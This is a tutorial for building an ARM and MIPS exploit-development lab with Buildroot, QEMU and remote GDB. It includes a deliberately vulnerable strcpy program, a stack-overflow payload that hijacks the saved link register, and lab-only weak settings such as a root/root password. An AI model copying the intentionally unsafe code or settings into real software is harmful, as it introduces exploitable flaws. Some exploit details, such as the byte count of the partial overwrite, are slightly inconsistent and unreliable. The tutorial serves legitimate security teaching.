Every exploit development tutorial on this site targets x86 or x64. But the majority of devices running in the real world — routers, cameras, industrial controllers, medical equipment — run ARM or MIPS on embedded Linux. If you want to find and exploit vulnerabilities on these targets, you need a lab that doesn’t require buying hardware for every architecture.
This tutorial builds that lab. You’ll configure a minimal ARM Linux system with Buildroot, boot it in QEMU with networking and serial access, cross-compile a vulnerable binary, and attach GDB to debug it remotely — the same workflow you’d use against a real embedded target, but entirely on your x86 workstation.
By the end, you’ll have a reusable environment for exploring ARM exploitation, testing cross-compiled tools, and validating embedded security research.
What each tool does
Before diving in, here’s how the pieces fit together.
┌────────────────────────────────────────────────────┐
│  Your x86 workstation                              │
│                                                    │
│  ┌─────────────────────────────────────────┐       │
│  │ Build container (podman)                │       │
│  │  ┌─────────────┐   ┌──────────────────┐ │       │
│  │  │  Buildroot  │──▶│  ARM rootfs +    │ │       │
│  │  │  toolchain  │   │  kernel (zImage) │ │       │
│  │  └─────────────┘   └───────┬──────────┘ │       │
│  └────────────────────────────┼────────────┘       │
│                               │ volume mount       │
│  ┌──────────────┐      ┌──────▼──────────┐         │
│  │ gdb-multiarch│◄────▶│  QEMU ARM VM    │         │
│  │   (host)     │ TCP  │  gdbserver      │         │
│  └──────────────┘ :1234│  (target)       │         │
│                        └─────────────────┘         │
└────────────────────────────────────────────────────┘

Buildroot generates the entire embedded system — cross-compilation toolchain, kernel, root filesystem — from a single configuration. It runs inside a container to keep build dependencies off your host. The build artifacts are volume-mounted, so QEMU and GDB access them directly. Buildroot is simpler than Yocto and better suited to security research where you want control, not enterprise packaging.
QEMU emulates the ARM hardware. You boot the Buildroot image in it the same way you’d flash it to a real board.
gdb-multiarch connects from your host to gdbserver running inside the VM, giving you full debugging capability across the architecture boundary.
Installing host dependencies
You need QEMU and GDB on your host machine. The Buildroot toolchain itself runs inside a container, so you don’t need build-essential or cross-compiler packages on the host.
# Debian/Ubuntu
sudo apt install -y qemu-system-arm gdb-multiarch podman
# Arch Linux
sudo pacman -S qemu-system-arm gdb podman

Note

On Arch, gdb already supports multiple architectures; on Debian/Ubuntu you need the separate gdb-multiarch package. The tutorial uses gdb-multiarch in commands — substitute gdb if you're on Arch. You can also substitute docker for podman throughout; the commands are identical.
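Before moving on, it's worth confirming that each tool resolves on your PATH. A minimal check (this loop is my addition, not part of the tutorial's scripts):

```shell
# Report which of the required host tools are installed
for tool in qemu-system-arm gdb-multiarch podman; do
  if command -v "$tool" >/dev/null 2>&1; then
    echo "ok: $tool"
  else
    echo "missing: $tool"
  fi
done
```

On Arch, check gdb instead of gdb-multiarch.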
Setting up the build container
Buildroot needs a consistent set of host tools (gcc, make, ncurses, etc.) that can conflict with your host system. A container keeps the build environment reproducible and your host clean.
Create a Containerfile in your working directory.
FROM docker.io/library/debian:bookworm-slim
RUN apt-get update && apt-get install -y --no-install-recommends \
build-essential gcc g++ unzip bc python3 \
libncurses-dev file wget cpio rsync git xz-utils ca-certificates \
&& rm -rf /var/lib/apt/lists/*
RUN useradd -m builder
USER builder
WORKDIR /home/builder

Build the container image.
podman build -t buildroot-env -f Containerfile .

Configuring Buildroot
Clone Buildroot on your host and run the configuration inside the container. Mounting the repo as a volume means build artifacts persist between container runs.
git clone https://github.com/buildroot/buildroot.git ~/buildroot
cd ~/buildroot
git checkout 2024.02.x  # use a stable release branch

Start from the QEMU ARM defconfig and customize it.
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make qemu_arm_versatile_defconfig
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make menuconfig

In the menuconfig interface, change these settings:
Target options
→ Target Architecture: ARM (little endian)
→ Target Architecture Variant: arm926t (keep default for versatilepb compatibility)
Toolchain
→ C library: glibc (musl works too, but glibc matches most real targets)
→ Enable C++ support: YES
→ Build cross gdb for the host: YES
→ GDB debugger Version: latest available
System configuration
→ Root password: root (for serial/SSH login)
→ /dev management: Dynamic using devtmpfs
Target packages → Networking applications
→ dropbear: YES (lightweight SSH server)
Target packages → Debugging, profiling and benchmark
→ gdb → gdbserver: YES (critical — this runs on the target)
→ strace: YES (useful for syscall tracing)
→ ltrace: YES (library call tracing)
Filesystem images
→ ext2/3/4 root filesystem: YES
→ ext2/3/4 variant: ext4
→ exact size: 256M (give yourself room)

Save and exit menuconfig. Build the image.
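If you prefer not to click through menuconfig, the same selections can be captured as a Kconfig fragment. The symbol names below are my reconstruction from a Buildroot 2024.02 tree, not taken from this tutorial — each menuconfig entry's help screen shows its exact symbol, so verify them there before relying on this:

```
# lab.fragment (hypothetical name) — append to .config and run `make olddefconfig`,
# or merge with support/kconfig/merge_config.sh
BR2_TOOLCHAIN_BUILDROOT_GLIBC=y
BR2_TOOLCHAIN_BUILDROOT_CXX=y
BR2_PACKAGE_HOST_GDB=y
BR2_TARGET_GENERIC_ROOT_PASSWD="root"
BR2_PACKAGE_DROPBEAR=y
BR2_PACKAGE_GDB=y
BR2_PACKAGE_GDB_SERVER=y
BR2_PACKAGE_STRACE=y
BR2_PACKAGE_LTRACE=y
BR2_TARGET_ROOTFS_EXT2=y
BR2_TARGET_ROOTFS_EXT2_4=y
BR2_TARGET_ROOTFS_EXT2_SIZE="256M"
```

A fragment like this is also the easiest way to reproduce the lab on another machine.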
podman run --rm -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make -j$(nproc)

Warning
Build time

The first Buildroot build compiles the entire toolchain, kernel, and all packages from source. Expect 15–40 minutes depending on your machine. Subsequent builds after config changes are much faster. The build artifacts persist in the mounted buildroot/ directory, so you don't lose progress when the container exits.
When it finishes, the output lives in output/images/:
ls -lh output/images/
# zImage            ← ARM kernel
# versatile-pb.dtb  ← device tree blob
# rootfs.ext4       ← root filesystem image

Booting in QEMU
Launch the ARM VM with networking and a serial console.
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel output/images/zImage \
-dtb output/images/versatile-pb.dtb \
-drive file=output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographic

Breaking down the flags:
| Flag | Purpose |
|---|---|
| -M versatilepb | Emulate the ARM Versatile PB board |
| -m 256M | 256 MB RAM (generous for embedded) |
| -kernel / -dtb | Boot directly with kernel + device tree |
| -drive | Attach the rootfs as a SCSI disk |
| -append | Kernel command line: root device + serial console |
| -net user,hostfwd=... | Forward host port 2222 → VM port 22 (SSH), 1234 → 1234 (GDB) |
| -nographic | Serial console on your terminal (no GUI window) |
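One thing the flag table doesn't cover: with -nographic, the serial console owns your terminal, and QEMU's escape sequences are the only way out. The essentials (these are standard QEMU key bindings, not specific to this setup):

```
Ctrl-A X   exit QEMU immediately
Ctrl-A C   toggle between the guest serial console and the QEMU monitor
Ctrl-A H   print the full list of escape sequences
```

Worth memorizing Ctrl-A X before you boot, or the first VM you start will feel impossible to leave.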
You should see the kernel boot and get a login prompt.
Welcome to Buildroot
buildroot login: root
Password: root
#

Verifying the environment
Run a few checks inside the VM.
uname -a
# Linux buildroot 6.1.x #1 SMP ... armv5l GNU/Linux
cat /proc/cpuinfo | head -5
# processor : 0
# model name : ARM926EJ-S rev 5 (v5l)
which gdbserver
# /usr/bin/gdbserver
which strace
# /usr/bin/strace

Test SSH from your host in another terminal.
ssh -p 2222 root@localhost

Leave the QEMU session running. You’ll work in two terminals from here — one for the VM (or SSH), one for your host.
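One snag worth knowing about (my addition): every rootfs rebuild gives dropbear a fresh host key, so the next SSH attempt fails with a host-key-changed warning. Clear the stale entry recorded for the forwarded port:

```shell
# Remove the remembered host key for the QEMU port-forward
# (|| true: harmless if there is no entry yet)
ssh-keygen -R "[localhost]:2222" || true
```

For a throwaway lab VM you can also skip host-key checking entirely: ssh -p 2222 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no root@localhost.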
Cross-compiling a vulnerable binary
Now create a deliberately vulnerable program to debug. This is the same classic stack overflow from the x86 tutorials, but compiled for ARM.
Create vuln.c on your host.
#include <stdio.h>
#include <string.h>
void secret() {
printf("You hijacked control flow on ARM.\n");
}
void vulnerable(char *input) {
char buf[64];
strcpy(buf, input);
printf("You entered: %s\n", buf);
}
int main(int argc, char **argv) {
if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable(argv[1]);
return 0;
}

Cross-compile it with the Buildroot toolchain inside the container. Place vuln.c in the buildroot/ directory so it’s visible in the mount.
cp vuln.c ~/buildroot/
podman run --rm -v ~/buildroot:/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
sh -c '
CROSS="$(find output/host/bin -maxdepth 1 -type f -name "*-gcc" | head -1 | sed "s/gcc$//")"
echo "Toolchain prefix: $CROSS"
${CROSS}gcc -o vuln vuln.c \
-fno-stack-protector \
-z execstack \
-no-pie \
-g
'
# Verify it's an ARM binary (back on the host)
file ~/buildroot/vuln
# vuln: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, ...

Tip
Keeping debug symbols

The -g flag embeds debug symbols into the binary. You’ll use this copy on the host for GDB. You can optionally strip a separate copy for the target to simulate real-world conditions, but for learning, symbols make everything clearer.
Copy the binary into the VM.
scp -P 2222 ~/buildroot/vuln root@localhost:/root/

Remote debugging with GDB
This is the core workflow. Start gdbserver inside the VM, then connect from your host.
On the target (VM)
cd /root
gdbserver :1234 ./vuln AAAA

Process /root/vuln created; pid = 142
Listening on port 1234

The program is loaded but paused, waiting for a debugger to attach.
On the host
gdb-multiarch -q ~/buildroot/vuln

Inside GDB, connect to the remote target and set the architecture.
(gdb) set architecture arm
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
...
(gdb) info registers
r0 0x2 2
r1 0xbefff584 3204446596
...
pc 0x10420 0x10420
cpsr 0x10 16

You’re now debugging an ARM binary from your x86 host. Every GDB command works: breakpoints, step, examine memory, backtrace.
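Typing the connection commands every session gets old; they can live in a GDB command file instead. This is my own convenience sketch (the file name and sysroot path are my choices): set sysroot points GDB at Buildroot's staging directory so symbols for the target's shared libraries resolve on the host.

```
# remote-arm.gdb: run with  gdb-multiarch -q ~/buildroot/vuln -x remote-arm.gdb
set architecture arm
set sysroot ~/buildroot/output/staging
target remote localhost:1234
```

Without the sysroot line, backtraces that pass through libc show bare addresses instead of function names.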
Key differences from x86
If you’re coming from the x86 overflow tutorials, ARM has a few critical differences.
| Concept | x86 | ARM |
|---|---|---|
| Return address | On the stack, overwritten via buffer overflow | In the lr (link register), pushed to stack only in non-leaf functions |
| Program counter | eip / rip | pc (r15) |
| Stack pointer | esp / rsp | sp (r13) |
| Calling convention | Arguments on stack (x86) or rdi/rsi/rdx (x64) | Arguments in r0-r3, then stack |
| Instruction alignment | Variable length, no alignment requirement | Fixed 4 bytes (ARM) or 2 bytes (Thumb), must be aligned |
| NX bypass | ROP with ret gadgets | ROP with pop {pc} or bx lr gadgets |
Finding the overflow offset
Set a breakpoint at vulnerable and inspect the stack layout.
(gdb) break vulnerable
(gdb) continue
(gdb) disassemble
Dump of assembler code for function vulnerable:
0x000104a0 <+0>: push {r7, lr}
0x000104a2 <+2>: sub sp, #72
0x000104a4 <+4>: add r7, sp, #0
...

The push {r7, lr} at the function prologue saves the link register (return address) and frame pointer onto the stack. This is what you’ll overwrite.
(gdb) # After strcpy returns:
(gdb) x/24wx $sp
0xbefff4c0: 0x41414141 0x41414141 ... ← buf starts here
...
0xbefff504: 0xbefff518 0x000104e0 ← saved r7, saved lr

The buffer is 64 bytes, then 4 bytes of padding, then saved r7, then saved lr. To control pc, you need to overwrite the saved lr: 64 bytes of buffer plus 4 of padding plus 4 for saved r7 puts it at offset 72 from the start of buf.
Check the target address first:
objdump -d ~/buildroot/vuln | grep "<secret>"
# 00010488 <secret>:Because the input comes from argv and is copied with strcpy, payload bytes cannot contain \x00. Instead of writing all 4 bytes of lr, do a partial overwrite of the low 2 bytes. If saved lr is 0x000104e0, writing \x88\x04 changes it to 0x00010488.
On the target:
gdbserver :1234 ./vuln "$(python3 -c "import sys; sys.stdout.buffer.write(b'A'*68 + b'BBBB' + b'\x88\x04\x01')")"

Reconnect GDB and continue.
(gdb) target remote localhost:1234
(gdb) continue

You hijacked control flow on ARM.

Warning
Thumb mode

Many ARM binaries (especially those compiled with -mthumb) use Thumb instructions. If your target uses Thumb, gadget addresses must have the lowest bit set (address | 1) to switch the processor into Thumb mode. Watch for SIGILL crashes — they often mean you’re jumping to a Thumb address without the bit set, or vice versa.
Using strace for syscall-level visibility
Before reaching for GDB, strace often tells you what you need to know. It works the same as on x86; strace decodes the ARM syscall table for you.
# Inside the VM
strace -f ./vuln AAAA

execve("./vuln", ["./vuln", "AAAA"], ...) = 0
brk(NULL) = 0x21000
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, ...) = 0xb6fff000
open("/lib/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
...
write(1, "You entered: AAAA\n", 18) = 18
exit_group(0) = ?

Filter to specific syscalls for targeted analysis.
# Only show memory-related syscalls
strace -e trace=memory ./vuln AAAA
# Only show network-related syscalls
strace -e trace=network ./some_daemon
# Follow child processes (important for forking daemons)
strace -f -e trace=process ./multi_process_app

Tip
strace + QEMU = powerful recon When analyzing an embedded binary you don’t have source for, running it under strace in QEMU is often the fastest way to understand its behavior: what files it opens, what network connections it makes, what devices it expects. This is the first step in most firmware analysis workflows.
Automating the workflow
Once you’ve done this manually a few times, script it. Create a run.sh that boots QEMU in the background and waits for SSH.
#!/bin/bash
BUILDROOT=~/buildroot
qemu-system-arm \
-M versatilepb \
-m 256M \
-kernel ${BUILDROOT}/output/images/zImage \
-dtb ${BUILDROOT}/output/images/versatile-pb.dtb \
-drive file=${BUILDROOT}/output/images/rootfs.ext4,if=scsi,format=raw \
-append "root=/dev/sda console=ttyAMA0,115200" \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographic \
-daemonize \
-pidfile /tmp/qemu-arm.pid
echo "Waiting for VM to boot..."
for i in $(seq 1 30); do
ssh -p 2222 -o ConnectTimeout=2 -o StrictHostKeyChecking=no root@localhost true 2>/dev/null && break
sleep 1
done
echo "VM ready. SSH: ssh -p 2222 root@localhost"
echo "To stop: kill \$(cat /tmp/qemu-arm.pid)"

And a debug.sh that deploys a binary and starts the debug session.
#!/bin/bash
BINARY=$1
shift || true
if [ -z "$BINARY" ]; then
echo "Usage: $0 <binary> [args...]"
exit 1
fi
# Deploy
scp -P 2222 "$BINARY" root@localhost:/root/
# Start gdbserver on the target
ssh -p 2222 root@localhost "killall gdbserver 2>/dev/null || true"
if [ "$#" -gt 0 ]; then
ssh -p 2222 root@localhost gdbserver :1234 "/root/$(basename "$BINARY")" "$@" &
else
ssh -p 2222 root@localhost gdbserver :1234 "/root/$(basename "$BINARY")" &
fi
sleep 1
# Connect GDB
gdb-multiarch -q "$BINARY" \
-ex "set architecture arm" \
-ex "target remote localhost:1234"

chmod +x run.sh debug.sh
./run.sh
./debug.sh ~/buildroot/vuln "AAAA"

Adding more architectures
The same workflow applies to other architectures with minimal changes. Here’s what to swap.
| Architecture | Buildroot defconfig | QEMU binary | GDB arch |
|---|---|---|---|
| ARM 32-bit | qemu_arm_versatile_defconfig | qemu-system-arm | arm |
| AArch64 | qemu_aarch64_virt_defconfig | qemu-system-aarch64 | aarch64 |
| MIPS 32-bit | qemu_mips32r2_malta_defconfig | qemu-system-mips | mips |
| MIPS little-endian | qemu_mipsel_malta_defconfig | qemu-system-mipsel | mips |
For MIPS (common in routers):
cd ~/buildroot
podman run --rm -it -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
sh -c 'make qemu_mipsel_malta_defconfig && make menuconfig'
# same changes as before: gdbserver, dropbear, etc.
podman run --rm -v "$(pwd)":/home/builder/buildroot:Z \
-w /home/builder/buildroot buildroot-env \
make -j$(nproc)

Boot the MIPS build:

qemu-system-mipsel \
-M malta \
-m 256M \
-kernel output/images/vmlinux \
-drive file=output/images/rootfs.ext4,format=raw \
-append "root=/dev/sda console=ttyS0" \
-net nic \
-net user,hostfwd=tcp::2222-:22,hostfwd=tcp::1234-:1234 \
-nographic

Now you can test exploits against the same architecture as your target device without touching physical hardware. The firmware extraction tutorial covers how to identify the architecture of a real target and bring its binaries into this environment.
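When a session is over, shut things down rather than leaving daemonized QEMUs around. A teardown sketch to pair with run.sh, matching its /tmp/qemu-arm.pid pidfile (the guest poweroff is best-effort; BatchMode keeps ssh from prompting if the VM is already gone):

```shell
# Ask the guest to power off cleanly, then reap the QEMU process if it lingers
ssh -p 2222 -o ConnectTimeout=2 -o BatchMode=yes root@localhost poweroff 2>/dev/null || true
sleep 2
if [ -f /tmp/qemu-arm.pid ]; then
  kill "$(cat /tmp/qemu-arm.pid)" 2>/dev/null || true
  rm -f /tmp/qemu-arm.pid
fi
```

Killing QEMU without a guest shutdown is usually fine here because the rootfs is a disposable build artifact; a clean poweroff just avoids ext4 journal recovery on the next boot.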
Where to go from here
You now have a repeatable cross-architecture lab. Some directions to take it:
- ARM ROP chains — the gadget-finding workflow from the ROP Gadget Hunting Toolkit translates directly; the gadgets just end with pop {pc} instead of ret
- Heap exploitation on ARM — the heap internals differ from x86 glibc; this lab is the right place to study them
- Emulating real firmware — extract a firmware image (next tutorial), mount its rootfs into QEMU using chroot, and debug the actual binaries
- Fuzzing embedded binaries — cross-compile AFL++ with the Buildroot toolchain and fuzz ARM binaries under QEMU user-mode emulation